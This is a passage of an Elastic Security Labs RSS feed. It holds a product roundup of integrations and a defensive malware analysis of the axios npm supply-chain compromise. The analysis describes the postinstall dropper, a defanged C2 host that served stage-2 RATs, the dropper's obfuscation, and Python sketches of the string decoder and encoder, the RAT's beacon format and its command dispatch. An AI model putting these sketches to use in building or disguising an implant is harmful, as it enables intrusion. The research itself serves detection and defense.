<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Product Updates</title>
        <link>https://www.elastic.co/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Mon, 13 Apr 2026 16:54:38 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Product Updates</title>
            <url>https://www.elastic.co/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/security-labs</link>
        </image>
        <copyright>© 2026 Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Elastic Security Integrations Roundup: Q1 2026]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-integrations-roundup-q1-2026</link>
            <guid>elastic-security-integrations-roundup-q1-2026</guid>
            <pubDate>Sat, 04 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs announces nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.]]></description>
            <content:encoded><![CDATA[<h2>A quarterly look at Elastic’s security integrations ecosystem</h2>
<p>Security teams can only protect what they can see. Gaps in coverage, like a macOS fleet generating logs that never reach your SIEM, an email gateway running in isolation, or a cloud environment producing findings that stay siloed in the vendor console, are easily exploited by attackers.</p>
<p>Elastic’s answer to this is continuous and open investment in third-party integrations, built on the belief that a strong security ecosystem requires deep integrations that make data from every corner of the stack searchable and contextualized. Today, we’re announcing nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.</p>
<p>Each integration ships with ingest pipelines that normalize and structure data out of the box, along with prebuilt dashboards that serve as an immediate starting point for visualization and analysis, so teams can search, correlate and investigate across new data sources from day one without writing or maintaining parsers.</p>
<h2>macOS Security Events</h2>
<p>Elastic Defend, the native integration that delivers Elastic Endpoint Security, collects rich security telemetry on macOS, but it is intentionally focused on high-value detection signals rather than full system auditing. Login and logout events, account creation and deletion, service registration changes, and application diagnostic logs all live outside that scope, leaving threat hunters and IR teams without complete macOS context. The macOS Security Events integration complements Elastic Defend, providing the same depth of OS-level visibility offered to Windows devices via the Windows Event Logs integration.</p>
<p>Each macOS endpoint generates tens of thousands of unified log entries. Left unfiltered, that volume creates noise rather than signal. This integration ships with predicate-based filters that scope ingestion to security-relevant events: authentication activity, process execution, network connections, file system changes, and system configuration modifications.</p>
<p>These predicate-based filters enable comprehensive macOS coverage without the cost or complexity of ingesting everything. Once ingested, these events are immediately available to Elastic Security’s AI Assistant. Analysts can ask natural-language questions like &quot;Show me all privilege escalation attempts on macOS endpoints in the last 24 hours&quot; or &quot;Summarize login failures for this host&quot;, turning raw unified log entries into actionable investigation context without writing a single query.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/macos">macOS Security Events</a> integration.</p>
<h2>IBM QRadar</h2>
<p>For teams running IBM QRadar in parallel with Elastic Security, alert ingestion into Elastic has become easier. The QRadar integration collects offense records from QRadar’s offense and rules endpoints, enriching each alert with the triggering rule’s name, ID, type and ownership, so analysts can triage in Elastic without switching back to QRadar.</p>
<p>This integration is the foundation of Elastic’s SIEM migration workflow for QRadar, which mirrors the capability already available for <a href="https://www.elastic.co/docs/reference/integrations/splunk">Splunk</a>. Teams can also use <a href="https://www.elastic.co/security-labs/from-qradar-to-elastic">Automatic Migration</a> for migrating their QRadar rules into Elastic. It uses semantic search and generative AI to map existing rules to Elastic’s 1,300+ prebuilt detections, and translates anything that doesn’t map directly into ES|QL, allowing you to consolidate your SIEM footprint without manually rebuilding your entire detection library.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/ibm_qradar">IBM QRadar</a> integration.</p>
<h2>Proofpoint Essentials</h2>
<p>For enterprise customers, Proofpoint TAP (Targeted Attack Protection) has been available in Elastic for some time. To bring the same email threat visibility to SMB environments and the MSPs and MSSPs who serve them, Proofpoint Essentials is now available as well.</p>
<p>The Proofpoint Essentials integration streams four event types into Elastic Security:</p>
<ul>
<li>Clicks on malicious URLs that were blocked</li>
<li>Clicks that were permitted</li>
<li>Messages blocked for containing threats recognized by URL Defense or Attachment Defense</li>
<li>Messages delivered despite containing those threats</li>
</ul>
<p>To easily surface this data, two prebuilt dashboards are available:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image2.png" alt="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image1.png" alt="Threat Overview dashboard" title="Threat Overview dashboard" /></p>
<p>For an SMB SOC team, this means phishing attempts, malware detections and policy violations land in the same platform as the rest of your security telemetry, removing the need to switch platforms to understand the full context of a threat.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/proofpoint_essentials">Proofpoint Essentials</a> integration.</p>
<h2>AWS Security Hub</h2>
<p>AWS Security Hub aggregates findings across your AWS environment, but investigating those findings means staying inside the AWS console, separate from the rest of your team’s security data. The Elastic integration changes this by pulling Security Hub findings into Elastic in Open Cybersecurity Schema Framework (OCSF) format and normalizing them to ECS, offering schema-consistent data that’s immediately searchable via ES|QL.</p>
<p>Findings land in the <a href="https://www.elastic.co/docs/solutions/security/cloud/findings-page-3">Elastic Vulnerability Findings</a> page, integrating AWS cloud security posture directly into the workflows already in place. From there, you can correlate Security Hub data with signals from other sources, such as endpoint alerts, identity events, and network telemetry, to build a fuller picture of risk across your AWS environment and investigate faster than the native console allows.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/aws_securityhub">AWS Security Hub</a> integration.</p>
<h2>More new Elastic Security integrations</h2>
<p>In addition to the featured integrations above, the following integrations are now available, each shipping with prebuilt dashboards for immediate value:</p>
<ul>
<li><a href="https://www.elastic.co/docs/reference/integrations/jupiter_one">JupiterOne</a>: Asset intelligence and cloud attack surface monitoring, ingesting cross-tool alerts, CVE findings, and threat detections enriched with MITRE ATT&amp;CK mappings, CVSS scores, and host context, for unified risk visibility.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/airlock_digital">Airlock Digital</a>: Application allowlisting and execution control telemetry, capturing blocked process executions with command lines, file hashes and publisher context, so unauthorized execution attempts are visible and correlatable alongside the rest of your endpoint detections.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/island_browser">Island Browser</a>: Enterprise browser security events spanning user navigation, device posture, compromised credential detection and admin activity, extending Elastic’s visibility to BYOD and unmanaged devices where traditional endpoint agents can’t be deployed.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/ironscales">Ironscales</a>: AI-powered phishing detection events capturing email metadata, sender reputation, affected mailbox counts and suspicious links, correlatable with endpoint and identity data for faster investigation and response.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/cyera">Cyera</a>: Data security posture management events, surfacing sensitive data risks including exposure severity, affected record counts, compliance framework violations, and datastore ownership across cloud environments, so sensitive data exposure doesn’t stay siloed in a separate DSPM console.</li>
</ul>
<h2>Get started</h2>
<p>These integrations reflect Elastic’s open approach to security. All nine integrations in this roundup ship with prebuilt dashboards and native ECS mappings, giving your team immediate visibility with no additional setup or custom visualization work required.</p>
<p>From there, findings, alerts and logs are immediately available to Elastic’s broader <a href="https://www.elastic.co/docs/solutions/security/ai/identify-investigate-document-threats">detection and investigation capabilities</a>: Attack Discovery for surfacing multi-stage threats, AI Assistant for natural-language investigation and guided response, and ES|QL and EQL for custom detection and hunting queries.</p>
<ul>
<li><a href="https://www.elastic.co/integrations/data-integrations?solution=security">Browse available integrations</a></li>
<li><a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">Learn about migrating to Elastic Security from other SIEMs</a></li>
</ul>
<p>Have questions or feedback? Join #security-siem in the <a href="https://www.elastic.co/community/">Elastic Stack Community Slack</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/elastic-security-integrations-roundup-q1-2026.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Inside the Axios supply chain compromise - one RAT to rule them all]]></title>
            <link>https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</link>
            <guid>axios-one-rat-to-rule-them-all</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes a supply chain compromise of the axios npm package delivering a unified cross-platform RAT]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs released <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">initial triage and detection rules</a> for the Axios supply-chain compromise. This is a detailed analysis of the RAT and payloads.</p>
</blockquote>
<h2>Introduction</h2>
<p>Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.</p>
<h3>Key takeaways</h3>
<ul>
<li>A compromised npm maintainer account (jasonsaayman) was used to publish two malicious versions of the widely used Axios HTTP client — 1.14.1 (tagged latest) and 0.30.4 (tagged legacy) — meaning a default npm install axios resolved to a backdoored package</li>
<li>The malicious JavaScript deploys platform-specific stage-2 implants for macOS, Windows, and Linux</li>
<li>All three stage-2 payloads are implementations of the <strong>same RAT</strong> — identical C2 protocol, command set, beacon cadence, and spoofed user-agent, written in PowerShell (Windows), C++ (macOS), and Python (Linux)</li>
<li>The dropper performs anti-forensic cleanup by deleting itself and swapping its package.json with a clean copy, erasing evidence of the postinstall trigger from <code>node_modules</code></li>
</ul>
<h2>Preamble</h2>
<p>On March 30, 2026, Elastic Security Labs detected a supply chain compromise targeting the <a href="https://www.npmjs.com/package/axios">axios</a> npm package through automated supply-chain monitoring. The attacker gained control of the npm account belonging to jasonsaayman, one of the project's primary maintainers, and published two backdoored versions within a 39-minute window.</p>
<p>The axios package is one of the most widely depended-upon HTTP client libraries in the JavaScript ecosystem. At the time of discovery, both the latest and legacy dist-tags pointed to compromised versions, ensuring that the majority of fresh installations pulled a backdoored release.</p>
<p>The malicious versions introduced a single new dependency: <code>plain-crypto-js</code>, a purpose-built package whose <code>postinstall</code> hook silently downloaded and executed platform-specific stage-2 RAT implants from <code>sfrclak[.]com:8000</code>.</p>
<p>What makes this campaign notable beyond its blast radius is the stage-2 tooling. The attacker deployed three parallel implementations of the <strong>same RAT</strong> — one each for Windows, macOS, and Linux — all sharing an identical C2 protocol, command structure, and beacon behavior. This isn't three different tools; it's a single cross-platform implant framework with platform-native implementations.</p>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on <strong>March 31, 2026 at 01:50 AM UTC</strong> to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image3.png" alt="GitHub Security Advisory filed to the axios repository" title="GitHub Security Advisory filed to the axios repository" /></p>
<p>As the community flagged the compromise on social media, Elastic Security Labs shared early findings publicly to help defenders respond in real time.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image2.png" alt="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" title="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" /></p>
<p>This post covers the full attack chain: from the npm-level supply chain compromise through the obfuscated dropper, to the architecture of the cross-platform RAT and the meaningful differences between its three variants.</p>
<h2>Campaign overview</h2>
<p>The compromise is evident from the npm registry metadata. The maintainer email changed from <code>jasonsaayman@gmail[.]com</code> — present on all prior legitimate releases — to <code>ifstap@proton[.]me</code> on the malicious versions. The publishing method also changed:</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Published By</th>
<th>Method</th>
<th>Provenance</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios@1.14.0</code> (legitimate)</td>
<td><code>jasonsaayman@gmail[.]com</code></td>
<td>GitHub Actions OIDC</td>
<td>SLSA provenance attestations</td>
</tr>
<tr>
<td><code>axios@1.14.1</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
<tr>
<td><code>axios@0.30.4</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
</tbody>
</table>
<p>The shift from a trusted OIDC publisher flow with SLSA provenance to a direct CLI publish with a changed email is a clear indicator of unauthorized access.</p>
<h3>Timeline</h3>
<ul>
<li><strong>2026-02-18 17:19 UTC</strong> — <code>axios@0.30.3</code> published legitimately by <code>jasonsaayman@gmail[.]com</code></li>
<li><strong>2026-03-27 19:01 UTC</strong> — <code>axios@1.14.0</code> published legitimately via GitHub Actions OIDC</li>
<li><strong>2026-03-30 05:57 UTC</strong> — <code>plain-crypto-js@4.2.0</code> published by <code>nrwise</code> (<code>nrwise@proton[.]me</code>) — clean decoy to build registry history</li>
<li><strong>2026-03-30 23:59 UTC</strong> — <code>plain-crypto-js@4.2.1</code> published by <code>nrwise</code> — malicious version with <code>postinstall</code> backdoor</li>
<li><strong>2026-03-31 00:21 UTC</strong> — <code>axios@1.14.1</code> published by compromised account — tagged <code>latest</code></li>
<li><strong>2026-03-31 01:00 UTC</strong> — <code>axios@0.30.4</code> published by compromised account — tagged <code>legacy</code></li>
</ul>
<h3>Affected packages</h3>
<ul>
<li><strong><code>axios@1.14.1</code> — Malicious, tagged <code>latest</code> at time of discovery</strong></li>
<li><strong><code>axios@0.30.4</code> — Malicious, tagged <code>legacy</code> at time of discovery</strong></li>
<li><strong><code>plain-crypto-js@4.2.0</code> — Clean decoy, published to build registry history</strong></li>
<li><strong><code>plain-crypto-js@4.2.1</code> — Malicious, payload delivery vehicle (<code>postinstall</code> backdoor)</strong></li>
</ul>
<p><strong>Safe versions:</strong> <code>axios@1.14.0</code> (last legitimate 1.x release with SLSA provenance) and <code>axios@0.30.3</code> (last legitimate <code>0.30.x</code> release).</p>
<p>The attacker tagged both the latest and legacy channels, maximizing the blast radius across projects using either the current or legacy axios API.</p>
<h2>Code analysis</h2>
<h3>Stage 1: The plain-crypto-js dropper</h3>
<p>The entire delivery chain hinges on npm's postinstall lifecycle hook. Installing either compromised axios version pulls <code>plain-crypto-js@^4.2.1</code> as a dependency, which declares:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This causes <code>setup.js</code> to execute automatically during <code>npm install</code> — no user interaction required.</p>
<p>The <code>setup.js</code> file uses a two-layer encoding scheme to conceal its behavior:</p>
<ul>
<li><strong>Layer 1:</strong> String reversal followed by Base64 decoding</li>
<li><strong>Layer 2:</strong> XOR cipher using the key <code>OrDeR_7077</code> with a position-dependent index (<code>7 * i² % 10</code>)</li>
</ul>
<p>All critical strings (module names, URLs, shell commands) are stored in an encoded array, <code>stq[]</code>, and decoded at runtime. The decoded contents reveal the operational infrastructure.</p>
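<p>A rough re-implementation of the scheme as described above can make it concrete. The key and index formula come from the dropper; the function names, and the companion encoder used only to round-trip the decoder, are our own. A minimal sketch in Python:</p>
<pre><code class="language-python">import base64

KEY = 'OrDeR_7077'  # 10-byte XOR key recovered from the dropper

def xor_layer(data):
    # Layer 2: XOR each byte with the key byte at index (7 * i**2) % 10
    return bytes(b ^ ord(KEY[(7 * i * i) % len(KEY)]) for i, b in enumerate(data))

def decode_string(encoded):
    # Layer 1: undo the string reversal, then Base64-decode; then strip the XOR layer
    return xor_layer(base64.b64decode(encoded[::-1])).decode()

def encode_string(plain):
    # Inverse transform, handy only for validating the decoder against known strings
    return base64.b64encode(xor_layer(plain.encode())).decode()[::-1]
</code></pre>
<p>Because XOR with a fixed per-position key byte is its own inverse, applying <code>xor_layer</code> twice returns the original bytes, which makes the decoder easy to verify.</p>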
<h3>Platform-specific delivery</h3>
<p>After decoding its string table, the dropper checks <code>os.platform()</code> and branches into one of three delivery routines. Each sends an HTTP POST to <code>http://sfrclak[.]com:8000/6202033</code> with a platform-specific body — <code>packages.npm.org/product0</code> (macOS), <code>packages.npm.org/product1</code> (Windows), <code>packages.npm.org/product2</code> (Linux) — allowing the C2 to serve the correct payload from a single endpoint. The <code>packages.npm.org/</code> prefix is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Delivery Method</th>
<th>Stage-2 Location</th>
<th>Disguise</th>
</tr>
</thead>
<tbody>
<tr>
<td>macOS</td>
<td>AppleScript via osascript downloads binary with curl</td>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Apple system daemon</td>
</tr>
<tr>
<td>Windows</td>
<td>VBScript downloads .ps1 via curl, executes via renamed PowerShell (<code>%PROGRAMDATA%\wt.exe</code>)</td>
<td><code>%TEMP%\6202033.ps1</code> (transient)</td>
<td>Windows Terminal</td>
</tr>
<tr>
<td>Linux</td>
<td>Direct curl download and python3 execution</td>
<td><code>/tmp/ld.py</code></td>
<td>None</td>
</tr>
</tbody>
</table>
<h3>Anti-forensics</h3>
<p>The dropper performs two cleanup actions:</p>
<ol>
<li><strong>Self-deletion:</strong> <code>setup.js</code> removes itself via <code>fs.unlink(__filename)</code></li>
<li><strong>Package manifest swap:</strong> A clean file named <code>package.md</code> (containing a benign version 4.2.0 configuration with no <code>postinstall</code> hook) is renamed to <code>package.json</code>, overwriting the malicious version</li>
</ol>
<p>Post-incident inspection of <code>node_modules/plain-crypto-js/package.json</code> reveals no trace of the <code>postinstall</code> trigger. The malicious <code>setup.js</code> is gone. Only the lockfile and npm audit logs retain evidence.</p>
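<p>Because the lockfile is the surviving artifact, responders can sweep projects for the compromised versions without trusting the contents of <code>node_modules</code>. A hypothetical sketch against the npm v2/v3 <code>package-lock.json</code> layout — the version list mirrors the affected packages in this campaign; the helper function is ours:</p>
<pre><code class="language-python"># Compromised versions from this campaign
COMPROMISED = {
    'axios': {'1.14.1', '0.30.4'},
    'plain-crypto-js': {'4.2.1'},
}

def scan_lockfile(lock):
    # 'lock' is a parsed package-lock.json (lockfileVersion 2 or 3),
    # whose 'packages' keys look like 'node_modules/axios'
    hits = []
    for path, meta in lock.get('packages', {}).items():
        name = path.rsplit('node_modules/', 1)[-1]
        if meta.get('version') in COMPROMISED.get(name, set()):
            hits.append(name + '@' + meta['version'])
    return sorted(hits)
</code></pre>
<p>Any hit warrants rebuilding the environment from a known-good lockfile rather than trusting the on-disk package tree.</p>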
<h3>Stage 2: Cross-platform RAT</h3>
<p>The three stage-2 payloads (PowerShell for Windows, compiled C++ for macOS, and Python for Linux) are not three different tools. They are three implementations of the <strong>same RAT specification</strong>, sharing an identical C2 protocol, command set, message format, and operational behavior. The consistency strongly indicates a single developer or tightly coordinated team working from a shared design document.</p>
<h4>Shared architecture</h4>
<p>The following properties are <strong>identical across all three variants:</strong></p>
<ul>
<li><strong>C2 transport: HTTP POST</strong></li>
<li><strong>Body encoding: Base64-encoded JSON</strong></li>
<li><strong>User-Agent: <code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></strong></li>
<li><strong>Beacon interval: 60 seconds</strong></li>
<li><strong>Session UID: 16-character random alphanumeric string, generated per-execution</strong></li>
<li><strong>Outbound message types: <code>FirstInfo</code>, <code>BaseInfo</code>, <code>CmdResult</code></strong></li>
<li><strong>Inbound command types: <code>kill</code>, <code>peinject</code>, <code>runscript</code>, <code>rundir</code></strong></li>
<li><strong>Response command types: <code>rsp_kill</code>, <code>rsp_peinject</code>, <code>rsp_runscript</code>, <code>rsp_rundir</code></strong></li>
</ul>
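<p>The shared wire format can be sketched as follows. The message types, UID format, beacon interval, and user-agent come from the list above; the JSON field names and helper functions are illustrative assumptions, since the exact key names are not reproduced here:</p>
<pre><code class="language-python">import base64
import json
import random
import string

# Anachronistic user-agent hardcoded identically in all three variants
USER_AGENT = 'mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)'
BEACON_INTERVAL_SECONDS = 60

def session_uid():
    # 16-character random alphanumeric string, generated once per execution
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def encode_message(msg_type, uid, fields):
    # Every variant POSTs a Base64-encoded JSON body; the 'type' and 'uid'
    # key names here are assumptions made for illustration
    body = {'type': msg_type, 'uid': uid}
    body.update(fields)
    return base64.b64encode(json.dumps(body).encode()).decode()

def decode_message(raw):
    return json.loads(base64.b64decode(raw))
</code></pre>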
<p>The spoofed IE8/Windows XP user-agent string is particularly notable: it is anachronistic on all three platforms, and its presence on a macOS or Linux host is a strong detection indicator.</p>
<h4>Initialization and reconnaissance</h4>
<p>On startup, each variant:</p>
<ol>
<li><strong>Generates a session UID</strong> — 16 random alphanumeric characters, included in every subsequent C2 message</li>
<li><strong>Detects OS and architecture</strong> — reports platform-specific identifiers (e.g., windows_x64, macOS, linux_x64)</li>
<li><strong>Enumerates initial directories</strong> of interest (user profile, documents, desktop, config directories)</li>
<li><strong>Sends a FirstInfo beacon</strong> containing the UID, OS identifier, and directory snapshot</li>
</ol>
<p>After initialization, the implant enters the main loop. The first BaseInfo heartbeat includes a comprehensive system profile. The same categories of data are collected on all platforms, though the underlying APIs differ:</p>
<table>
<thead>
<tr>
<th>Data Collected</th>
<th>Windows Source</th>
<th>macOS Source</th>
<th>Linux Source</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hostname</td>
<td>%COMPUTERNAME% env var</td>
<td>gethostname()</td>
<td>/proc/sys/kernel/hostname</td>
</tr>
<tr>
<td>Username</td>
<td>%USERNAME% env var</td>
<td>getuid() + getpwuid()</td>
<td>os.getlogin()</td>
</tr>
<tr>
<td>OS version</td>
<td>WMI / registry</td>
<td>sysctlbyname(&quot;kern.osproductversion&quot;)</td>
<td>platform.system() + platform.release()</td>
</tr>
<tr>
<td>Timezone</td>
<td>System timezone</td>
<td>localtime_r()</td>
<td>datetime.timezone</td>
</tr>
<tr>
<td>Boot time</td>
<td>System uptime</td>
<td>sysctl(&quot;kern.boottime&quot;)</td>
<td>/proc/uptime</td>
</tr>
<tr>
<td>Install date</td>
<td>Registry / WMI</td>
<td>stat(&quot;/&quot;) or sysctl</td>
<td>ctime of /var/log/installer or /var/log/dpkg.log</td>
</tr>
<tr>
<td>Hardware model</td>
<td>WMI</td>
<td>sysctlbyname(&quot;hw.model&quot;)</td>
<td>/sys/class/dmi/id/product_name</td>
</tr>
<tr>
<td>CPU type</td>
<td>WMI</td>
<td>sysctlbyname()</td>
<td>platform.machine()</td>
</tr>
<tr>
<td>Process list</td>
<td>Full PID, session, name, path</td>
<td>popen(&quot;ps&quot;) (up to 1000)</td>
<td>Full /proc enumeration (PID, PPID, user, cmdline)</td>
</tr>
</tbody>
</table>
<p>Subsequent heartbeats are lightweight, containing only a timestamp to confirm the implant is alive.</p>
<h4>Command dispatch</h4>
<p>The C2 response is parsed as JSON, and the type field determines the action. All three variants implement the same four commands:</p>
<p><strong>kill — Self-termination.</strong> Sends an <code>rsp_kill</code> acknowledgment and exits. The Windows variant's persistence mechanism (registry key + batch file) survives the <code>kill</code> command unless explicitly cleaned up; the macOS and Linux variants have no persistence of their own.</p>
<p><strong>runscript — Script/command execution.</strong> The operator's primary interaction command. Accepts a <code>Script</code> field (code to execute) and a <code>Param</code> field (arguments). When <code>Script</code> is empty, <code>Param</code> is run directly as a command. The execution mechanism is platform-native:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Execution Mechanism</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>PowerShell with -NoProfile -ep Bypass</td>
</tr>
<tr>
<td>macOS</td>
<td>AppleScript via /usr/bin/osascript</td>
</tr>
<tr>
<td>Linux</td>
<td>Shell via subprocess.run(shell=True) or Python via python3 -c</td>
</tr>
</tbody>
</table>
<p><strong>peinject — Binary payload delivery.</strong> Despite the Windows-centric naming (&quot;PE inject&quot;), all three platforms implement this as a way to drop and execute binary payloads:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Implementation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>Reflective .NET assembly loading via [System.Reflection.Assembly]::Load()</td>
</tr>
<tr>
<td>macOS</td>
<td>Base64-decodes and drops a binary, executes with operator-supplied parameters.</td>
</tr>
<tr>
<td>Linux</td>
<td>Base64-decodes a binary to /tmp/.&lt;random 6-char string&gt; (hidden file), launches via subprocess.Popen().</td>
</tr>
</tbody>
</table>
<p>The Windows implementation executes in memory with no file drop, but it makes no attempt to disable AMSI, which is likely to flag the reflective assembly load. The macOS and Linux variants take the simpler approach of writing a binary to disk and executing it directly.</p>
<p><strong>rundir — Directory enumeration.</strong> Accepts paths and returns detailed file listings (name, size, type, creation/modification timestamps, child count for directories). Allows the operator to interactively browse the filesystem.</p>
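<p>Taken together, the command handling common to all three variants reduces to a small dispatch loop. The four command names and the <code>rsp_</code> acknowledgment prefix come from the analysis above; the handler wiring and field names are a simplified illustration:</p>
<pre><code class="language-python">COMMANDS = {'kill', 'peinject', 'runscript', 'rundir'}

def dispatch(cmd, handlers):
    # The C2 response is parsed as JSON and the 'type' field selects the
    # handler; each recognized command is answered with a matching rsp_* message
    ctype = cmd.get('type')
    if ctype not in COMMANDS:
        return None
    result = handlers[ctype](cmd)
    return {'type': 'rsp_' + ctype, 'result': result}
</code></pre>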
<h4>Capability summary</h4>
<table>
<thead>
<tr>
<th>Capability</th>
<th>Windows (PowerShell)</th>
<th>macOS (C++)</th>
<th>Linux (Python)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Persistence</td>
<td>Registry Run key + hidden .bat</td>
<td>None</td>
<td>None</td>
</tr>
<tr>
<td>Script execution</td>
<td>PowerShell</td>
<td>AppleScript via osascript</td>
<td>Shell or Python inline</td>
</tr>
<tr>
<td>Binary injection</td>
<td>Reflective .NET load injecting into cmd.exe</td>
<td>Binary drop + execute</td>
<td>Binary drop to /tmp/ + execute</td>
</tr>
<tr>
<td>Anti-forensics</td>
<td>Hidden windows, temp file cleanup</td>
<td>Hidden temp .scpt</td>
<td>Hidden /tmp/.XXXXXX files</td>
</tr>
</tbody>
</table>
<h2>Attribution</h2>
<p>The macOS Mach-O binary delivered by the <code>plain-crypto-js</code> postinstall hook exhibits significant overlap with <strong>WAVESHAPER</strong>, a C++ backdoor tracked by Mandiant and attributed to <strong>UNC1069</strong>, a DPRK-linked threat cluster.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image1.png" alt="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" title="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" /></p>
<h2>Conclusion</h2>
<p>This campaign demonstrates the continued attractiveness of the npm ecosystem as a supply chain attack vector. By compromising a single maintainer account on one of the JavaScript ecosystem's most depended-upon packages, the attacker gained a delivery mechanism with potential reach into millions of environments.</p>
<p>The toolkit's most reliable detection indicator is also its most curious design choice: the IE8/Windows XP user-agent string hardcoded identically across all three platform variants. While it provides a consistent protocol fingerprint for C2 server-side routing, it is trivially detectable on any modern network — and is an immediate anomaly on macOS and Linux hosts.</p>
<p>Elastic Security Labs will continue monitoring this activity cluster and will update this post with any additional findings.</p>
<h2>MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1195/001/">Supply Chain Compromise: Compromise Software Dependencies</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/007/">Command and Scripting Interpreter: JavaScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/004/">Command and Scripting Interpreter: Unix Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/006/">Command and Scripting Interpreter: Python</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/001/">Boot or Logon Autostart Execution: Registry Run Keys</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1564/001/">Hidden Files and Directories</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/004/">Indicator Removal: File Deletion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1083/">File and Directory Discovery</a></li>
